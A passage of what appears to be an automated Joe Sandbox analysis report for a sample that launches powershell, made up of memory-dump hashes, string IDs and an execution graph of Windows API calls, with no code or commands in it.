                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00590035363e6c8fe05a9486c5a4b01939d56b231b01a2e093bb4448abb86cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E217F32618F818AD720DF65E8406AEB3A0FB88748FA00135EA8D43B58EF3CC519CB11
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007B1210
• String ID: ..\s\ssl\statem\extensions_clnt.c
• API String ID: 1012300203-592572767
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007B1210
• String ID: ..\s\ssl\statem\extensions_srvr.c$3
• API String ID: 1012300203-3555168737
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
Strings
Memory Dump Source
• Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
Similarity
• API ID:
• String ID: iQ_L
• API String ID: 0-1214082866
Strings
Memory Dump Source
• Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
Similarity
• API ID:
• String ID: iQ_L
• API String ID: 0-1214082866
Strings
Memory Dump Source
• Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
Similarity
• API ID:
• String ID: /Q^
• API String ID: 0-497705585
Memory Dump Source
• Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3d88b84cbaff0810501a831bd75143f49551401a66ff7d3b6042c05f9ab5b61e
                                                                                                                                                                                                                                        • Instruction ID: ee23894a7e91fa0fcbc1ab072646704261e295cfc7f2bbbcf3a464f0c2bcba1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d88b84cbaff0810501a831bd75143f49551401a66ff7d3b6042c05f9ab5b61e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6D15731E1EB8A9FEB95AB6858185B97BE2FF06790B0801FED00DC70D3DA19AC05C355
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2230475030.00007FF8474DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474DD000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8474dd000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b9d3558893a0d945dd131e3ed1f3eddebf5dfeba19fcda3f7849754753d9c0f1
                                                                                                                                                                                                                                        • Instruction ID: 5ebcdd7a440556be85992254c595bfc7f0796bb66598df01c28f047de530de97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9d3558893a0d945dd131e3ed1f3eddebf5dfeba19fcda3f7849754753d9c0f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41157180DBC48FE7569B3998459A23FF0EF53364B1506EFD0C8CB1A3D625A846C792
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4ceaacea401a5576e4c36ed608e25b77a2e3138bf6fa5268152a354a879e2608
                                                                                                                                                                                                                                        • Instruction ID: 578aab17174b661b560042c6b25a13ed1804003f0f7b54074b237de0b4c60688
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ceaacea401a5576e4c36ed608e25b77a2e3138bf6fa5268152a354a879e2608
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C131B57191CB888FDB189B5C9C066E97BF0FB99711F00426FE449D3252DA71A855CBC2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5d16d3998c66611d13640c0d10400d9e54de1fdac20053561a36e3a784d50a80
                                                                                                                                                                                                                                        • Instruction ID: 6850caa5ff1c4bb563ef2a90ee1aa81908db62b41d4b5b4fe125f135c82f35eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d16d3998c66611d13640c0d10400d9e54de1fdac20053561a36e3a784d50a80
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E31C57161CB888FDB49DB6CDC497E97BF0EF66324F0441ABD058C7152DA24A41ACB92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction ID: c6043eeaaf01bdc5c371b24dd5f80e8f47315a491e1f9b889fede4f0cb959390
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0401677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 932fe25a96255ac537f174e8de1c100fb8bec4956a5cdf622dd61897872460a9
                                                                                                                                                                                                                                        • Instruction ID: bfb048362f37a51bf29b73eebdddb96a17db9225f90f1ef0644a294e1cef0422
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 932fe25a96255ac537f174e8de1c100fb8bec4956a5cdf622dd61897872460a9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FF0C272908A8C8FCB55EF28DC592E93FE0FF66245F0502ABD859CB051E7724518C7C2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8d39a95b2e34a6e4f07252022446041415df977e840567098c17fdcb38e0141f
                                                                                                                                                                                                                                        • Instruction ID: 83b3bb4469e653f8313071aee81f3d1bccfcaf267d64ca126fc30084794802f7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d39a95b2e34a6e4f07252022446041415df977e840567098c17fdcb38e0141f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0BE32E0D6098FDA68EA1CE8008E87BE1FF8536071100BAE05DC70ABDA26EC41C780
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 261b4e67829f359148dbbc97ae8ed626c1c86f97f89529bd7e94da1e6d0b43b9
                                                                                                                                                                                                                                        • Instruction ID: a81b69108b1fc882975fdaf839ddf328f3f03a11c937fcc104e5eebe69a3ff77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 261b4e67829f359148dbbc97ae8ed626c1c86f97f89529bd7e94da1e6d0b43b9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF05E31A0D5498FDA55EA1CE4418E87BE0EF4536071500B6E559CB16BDA26EC448790
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                                                                                        • API String ID: 0-1031638419
                                                                                                                                                                                                                                        • Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                                                                                                                                                                        • Instruction ID: d3352af175113f7de40d2d32539e35b0de4342478a49ec8c9811cb0008082b10
• Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
• Instruction Fuzzy Hash: CA21F1777085166FD3027AEDB8025EC7390DBD46B634991B3D358CB553EA14B08B8AD4
Strings
Memory Dump Source
• Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
Similarity
• API ID:
• String ID: L_^$L_^$L_^$L_^
• API String ID: 0-2357752022
• Opcode ID: 27f3c56b122c4cd1435788e770f1e405fb2db1ffd8bc27715e115a564efeaab1
• Instruction ID: ca1c8cb59265e2d13b1cb74583e032193bac0c3e0def28c7e031fb64680ba781
• Opcode Fuzzy Hash: 27f3c56b122c4cd1435788e770f1e405fb2db1ffd8bc27715e115a564efeaab1
• Instruction Fuzzy Hash: FF515372A0EAC38FE35656394C66159BFA0FF52398B1A42F6C0D48F093FF5928568712
Memory Dump Source
• Source File: 0000002A.00000002.2302403362.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ff8476a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 78e9b5c300f527b8e36eaa1398be40fe5a9229604fda86dee356184a7617763a
• Instruction ID: 6b2a83413b68d383b4ce460c274d7701f4bd9e1b14465296412eff90fda86b30
• Opcode Fuzzy Hash: 78e9b5c300f527b8e36eaa1398be40fe5a9229604fda86dee356184a7617763a
• Instruction Fuzzy Hash: 5D223821E0DB899FEB9AA73868556BA7BF2EF47650F0801FBD04DC7193E9189C06C741
Memory Dump Source
• Source File: 0000002A.00000002.2301837901.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ff8475d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5fecd3ed9da3d3592d55487b7f70f055f1d0385f2586270ceadcafa6d0a8c1d
• Instruction ID: 3e0fa9093f8a7930af8d92681a4716fdd6263c20ca0094d50df6308ee2a590c8
• Opcode Fuzzy Hash: c5fecd3ed9da3d3592d55487b7f70f055f1d0385f2586270ceadcafa6d0a8c1d
• Instruction Fuzzy Hash: 4561F471E0DA498FD745EB6CD8556ADBBF1EF4A310F1480BED449DB292DB35A802CB80
Memory Dump Source
• Source File: 0000002A.00000002.2301837901.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ff8475d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: ec7303ac25b6f2ba240a62a78cda6aba8bd6885d5843fd76fa0bf63e93a1e51e
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: DE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D636E882CB45

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 1213
Total number of Limit Nodes: 32
38947->38953 38948->38947 38950 7ff6aa1a1958 CloseHandle 38948->38950 38949->38918 38950->38947 38952->38942 38953->38949 38954 7ff6aa1ca924 38956 7ff6aa1ca949 sprintf 38954->38956 38955 7ff6aa1ca97f CompareStringA 38956->38955 38957 7ff6aa1cbb70 38960 7ff6aa1cbb80 38957->38960 38969 7ff6aa1cbae8 38960->38969 38962 7ff6aa1cbb79 38964 7ff6aa1cbbd5 LeaveCriticalSection 38966 7ff6aa1cbae8 67 API calls 38964->38966 38965 7ff6aa1cbbc8 SetEvent 38965->38964 38967 7ff6aa1cbb97 38966->38967 38967->38962 38974 7ff6aa191690 38967->38974 38978 7ff6aa1cb974 WaitForSingleObject 38969->38978 38972 7ff6aa1cbb12 38972->38967 38973 7ff6aa1cbb16 EnterCriticalSection LeaveCriticalSection 38973->38972 38975 7ff6aa1916c2 EnterCriticalSection 38974->38975 38976 7ff6aa1916a4 38974->38976 38975->38964 38975->38965 38976->38975 38986 7ff6aa191180 38976->38986 38979 7ff6aa1cb986 GetLastError 38978->38979 38980 7ff6aa1cb9b7 38978->38980 38984 7ff6aa19ca6c 48 API calls 3 library calls 38979->38984 38980->38972 38980->38973 38982 7ff6aa1cb9a6 38985 7ff6aa19ca40 61 API calls _CxxThrowException 38982->38985 38984->38982 38985->38980 38987 7ff6aa1911ab 38986->38987 38995 7ff6aa1911b0 38986->38995 38996 7ff6aa1917c8 216 API calls 2 library calls 38987->38996 38989 7ff6aa19166a 38989->38976 38990 7ff6aa1b6e90 216 API calls 38990->38995 38991 7ff6aa1b6d38 216 API calls 38991->38995 38992 7ff6aa191080 48 API calls 38992->38995 38994 7ff6aa1b6fe8 216 API calls 38994->38995 38995->38989 38995->38990 38995->38991 38995->38992 38995->38994 38997 7ff6aa1917c8 216 API calls 2 library calls 38995->38997 38996->38995 38997->38995 38998 7ff6aa181884 39130 7ff6aa1b34e4 38998->39130 39001 7ff6aa181926 39003 7ff6aa18195b 39001->39003 39194 7ff6aa1b3f98 63 API calls 2 library calls 39001->39194 39002 7ff6aa1b34e4 CompareStringW 39004 7ff6aa1818a6 39002->39004 39011 7ff6aa181970 39003->39011 39195 7ff6aa1a2ed8 100 API calls 3 library calls 39003->39195 39005 7ff6aa1b34e4 CompareStringW 39004->39005 39010 
7ff6aa1818b9 39004->39010 39005->39010 39009 7ff6aa181915 39193 7ff6aa19ca40 61 API calls _CxxThrowException 39009->39193 39010->39001 39192 7ff6aa181168 8 API calls 2 library calls 39010->39192 39013 7ff6aa1819b8 39011->39013 39196 7ff6aa1c49f4 48 API calls 39011->39196 39134 7ff6aa185450 39013->39134 39015 7ff6aa1819b0 39197 7ff6aa198444 54 API calls fflush 39015->39197 39021 7ff6aa1872c4 76 API calls 39028 7ff6aa181a12 39021->39028 39022 7ff6aa181ae6 39168 7ff6aa187514 39022->39168 39023 7ff6aa181b04 39172 7ff6aa196c94 39023->39172 39026 7ff6aa181af2 39027 7ff6aa187514 72 API calls 39026->39027 39029 7ff6aa181aff 39027->39029 39028->39022 39028->39023 39030 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39029->39030 39031 7ff6aa182f97 39030->39031 39032 7ff6aa181b13 39188 7ff6aa187148 39032->39188 39034 7ff6aa181c71 39035 7ff6aa181ca7 39034->39035 39036 7ff6aa1863e8 8 API calls 39034->39036 39037 7ff6aa181cd5 39035->39037 39038 7ff6aa181ce4 39035->39038 39039 7ff6aa181c91 39036->39039 39040 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39037->39040 39041 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39038->39041 39042 7ff6aa1849b8 99 API calls 39039->39042 39046 7ff6aa181cee 39040->39046 39041->39046 39043 7ff6aa181c9d 39042->39043 39044 7ff6aa1863e8 8 API calls 39043->39044 39044->39035 39045 7ff6aa181d50 39048 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39045->39048 39046->39045 39047 7ff6aa1cde30 72 API calls 39046->39047 39047->39045 39049 7ff6aa181d62 39048->39049 39050 7ff6aa1cdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39049->39050 39051 7ff6aa181d7b 39049->39051 39050->39051 39052 7ff6aa1d2bcc 66 API calls 39051->39052 39053 7ff6aa181dba 39052->39053 39126 7ff6aa1aae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39053->39126 39054 7ff6aa181e1c 39056 
7ff6aa1810c0 8 API calls 39054->39056 39058 7ff6aa181e5d 39054->39058 39055 7ff6aa181dde std::bad_alloc::bad_alloc 39055->39054 39057 7ff6aa1dba34 _CxxThrowException RtlPcToFileHeader RaiseException 39055->39057 39056->39058 39057->39054 39059 7ff6aa18a410 159 API calls 39058->39059 39124 7ff6aa181ef4 39058->39124 39059->39124 39060 7ff6aa182d0c 39062 7ff6aa1cde30 72 API calls 39060->39062 39071 7ff6aa182d21 39060->39071 39061 7ff6aa182ccc 39061->39060 39125 7ff6aa1a8c80 72 API calls 39061->39125 39062->39071 39063 7ff6aa1a6688 48 API calls 39063->39124 39064 7ff6aa182d86 39068 7ff6aa1c49f4 48 API calls 39064->39068 39106 7ff6aa182dd0 39064->39106 39065 7ff6aa1cb6d0 73 API calls 39123 7ff6aa182005 39065->39123 39066 7ff6aa185e70 169 API calls 39066->39123 39067 7ff6aa198444 54 API calls 39067->39123 39075 7ff6aa182d9e 39068->39075 39069 7ff6aa18a504 208 API calls 39069->39106 39070 7ff6aa1880e4 192 API calls 39070->39106 39071->39064 39073 7ff6aa1c49f4 48 API calls 39071->39073 39072 7ff6aa185928 237 API calls 39072->39123 39076 7ff6aa182d6c 39073->39076 39074 7ff6aa18e6c8 157 API calls 39074->39124 39078 7ff6aa198444 54 API calls 39075->39078 39080 7ff6aa1c49f4 48 API calls 39076->39080 39077 7ff6aa18a410 159 API calls 39077->39124 39081 7ff6aa182da6 39078->39081 39079 7ff6aa1a7c7c 127 API calls 39079->39106 39084 7ff6aa182d79 39080->39084 39087 7ff6aa1a1c24 12 API calls 39081->39087 39082 7ff6aa181168 8 API calls 39082->39106 39083 7ff6aa18b540 147 API calls 39083->39124 39086 7ff6aa198444 54 API calls 39084->39086 39085 7ff6aa19e21c 63 API calls 39085->39123 39086->39064 39087->39106 39088 7ff6aa1a65b4 48 API calls 39088->39124 39089 7ff6aa1cae50 71 API calls 39093 7ff6aa182e39 39089->39093 39090 7ff6aa1a4554 16 API calls 39090->39124 39091 7ff6aa1a1998 138 API calls 39091->39124 39092 7ff6aa1833b4 64 API calls 39092->39106 39093->39089 39095 7ff6aa19ca40 61 API calls 39093->39095 39093->39106 39094 7ff6aa185db4 46 API calls 39094->39124 39095->39106 39096 
7ff6aa1a1e80 15 API calls 39096->39124 39097 7ff6aa186188 231 API calls 39097->39106 39098 7ff6aa183f74 138 API calls 39098->39106 39099 7ff6aa18b540 147 API calls 39099->39123 39100 7ff6aa1a7c7c 127 API calls 39100->39124 39101 7ff6aa1a1930 11 API calls 39101->39124 39102 7ff6aa18571c 12 API calls 39102->39124 39103 7ff6aa1bba9c 195 API calls 39103->39106 39104 7ff6aa1c49f4 48 API calls 39104->39106 39105 7ff6aa185004 49 API calls 39105->39124 39106->39069 39106->39070 39106->39079 39106->39082 39106->39092 39106->39093 39106->39097 39106->39098 39106->39103 39106->39104 39107 7ff6aa198444 54 API calls 39106->39107 39107->39106 39108 7ff6aa18a4d0 12 API calls 39108->39124 39109 7ff6aa1a18ac 15 API calls 39109->39124 39110 7ff6aa181168 8 API calls 39110->39124 39111 7ff6aa1cd48c 58 API calls 39111->39124 39112 7ff6aa185e70 169 API calls 39112->39124 39113 7ff6aa1cc0a8 10 API calls 39113->39124 39114 7ff6aa199be0 14 API calls 39114->39124 39115 7ff6aa1a6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39115->39124 39116 7ff6aa1b97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39116->39124 39117 7ff6aa19cbd0 75 API calls 39117->39124 39118 7ff6aa1a5c0c 237 API calls 39118->39124 39119 7ff6aa1a5d40 237 API calls 39119->39124 39120 7ff6aa186114 216 API calls 39120->39124 39121 7ff6aa1c49f4 48 API calls 39121->39123 39122 7ff6aa1a5708 237 API calls 39122->39124 39123->39065 39123->39066 39123->39067 39123->39072 39123->39085 39123->39099 39123->39121 39123->39124 39124->39061 39124->39063 39124->39074 39124->39077 39124->39083 39124->39088 39124->39090 39124->39091 39124->39094 39124->39096 39124->39100 39124->39101 39124->39102 39124->39105 39124->39108 39124->39109 39124->39110 39124->39111 39124->39112 39124->39113 39124->39114 39124->39115 39124->39116 39124->39117 39124->39118 39124->39119 39124->39120 39124->39122 39124->39123 39127 7ff6aa1aa250 237 API calls 39124->39127 39128 7ff6aa1aaae0 237 API calls 39124->39128 
39129 7ff6aa190d60 237 API calls 39124->39129 39125->39060 39126->39055 39127->39124 39128->39123 39129->39123 39131 7ff6aa1b34f6 39130->39131 39133 7ff6aa181893 39131->39133 39198 7ff6aa1cdac0 CompareStringW 39131->39198 39133->39002 39133->39010 39136 7ff6aa18546f setbuf 39134->39136 39135 7ff6aa18554a __scrt_fastfail 39139 7ff6aa1cc0a8 10 API calls 39135->39139 39136->39135 39152 7ff6aa185588 __scrt_fastfail 39136->39152 39138 7ff6aa185583 39228 7ff6aa186eb8 39138->39228 39140 7ff6aa185576 39139->39140 39143 7ff6aa18681c 54 API calls 39140->39143 39143->39138 39144 7ff6aa1856e9 39235 7ff6aa1c6f68 39144->39235 39146 7ff6aa1856f6 39147 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39146->39147 39148 7ff6aa1819df 39147->39148 39154 7ff6aa1872c4 39148->39154 39152->39138 39199 7ff6aa183210 39152->39199 39205 7ff6aa197088 39152->39205 39209 7ff6aa18681c 39152->39209 39220 7ff6aa1c7a24 39152->39220 39239 7ff6aa18571c 39152->39239 39247 7ff6aa194380 14 API calls 39152->39247 39155 7ff6aa1872eb 39154->39155 39357 7ff6aa1988dc 39155->39357 39157 7ff6aa187302 39361 7ff6aa1b915c 39157->39361 39159 7ff6aa18730f 39373 7ff6aa1b7044 39159->39373 39162 7ff6aa1da444 new 4 API calls 39163 7ff6aa1873e3 39162->39163 39164 7ff6aa1873f5 __scrt_fastfail 39163->39164 39378 7ff6aa1a894c 39163->39378 39166 7ff6aa199be0 14 API calls 39164->39166 39167 7ff6aa181a01 39166->39167 39167->39021 39169 7ff6aa187539 39168->39169 39404 7ff6aa1b922c 39169->39404 39173 7ff6aa196d45 39172->39173 39174 7ff6aa196cbc 39172->39174 39175 7ff6aa196d83 39173->39175 39177 7ff6aa196d69 39173->39177 39420 7ff6aa1b9f78 8 API calls 2 library calls 39173->39420 39176 7ff6aa196cd9 39174->39176 39415 7ff6aa1b9f78 8 API calls 2 library calls 39174->39415 39175->39032 39179 7ff6aa196cf3 39176->39179 39416 7ff6aa1b9f78 8 API calls 2 library calls 39176->39416 39177->39175 39421 7ff6aa1b9f78 8 API calls 2 library calls 39177->39421 39182 7ff6aa196d0d 39179->39182 39417 7ff6aa1b9f78 8 API calls 2 library calls 
